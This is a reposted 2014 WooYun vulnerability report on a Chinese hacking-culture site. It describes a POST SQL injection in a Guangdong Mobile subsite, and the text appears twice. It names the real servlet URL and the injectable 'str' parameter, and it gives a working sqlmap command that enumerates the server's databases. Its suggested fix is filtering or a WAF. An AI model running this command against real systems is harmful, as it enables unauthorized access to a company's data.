记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

广东移动某分站存在POST注入漏洞 (大量数据库)

2014-11-01 00:05

# 站点URL:http://gd.10086.cn/shadu/kvweb/index.jsp

来张高清大图

2.png



该站点 http://gd.10086.cn/shadu/servlet/QuestionNoteServlet 存在POST注入

1.png







我们用sqlmap来试试看,post DATA str参数存在注入



sqlmap -u "http://gd.10086.cn/shadu/servlet/QuestionNoteServlet" --data="date=1410850642000&nowPage=1&str=e" -p "str" --dbs



3.png





存在盲注

库非常多



4.png





5.png





危害还是很大的。库很多。

不深入了,没做任何导出数据操作。



漏洞证明:

# 站点URL:http://gd.10086.cn/shadu/kvweb/index.jsp

来张高清大图

2.png



该站点 http://gd.10086.cn/shadu/servlet/QuestionNoteServlet 存在POST注入

1.png







我们用sqlmap来试试看,post DATA str参数存在注入



sqlmap -u "http://gd.10086.cn/shadu/servlet/QuestionNoteServlet" --data="date=1410850642000&nowPage=1&str=e" -p "str" --dbs



3.png





存在盲注

库非常多



4.png





5.png





危害还是很大的。库很多。

不深入了,没做任何导出数据操作。

修复方案:

过滤,有钱搞个WAF


知识来源: www.wooyun.org/bugs/wooyun-2014-076236

阅读:149277 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“广东移动某分站存在POST注入漏洞 (大量数据库)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云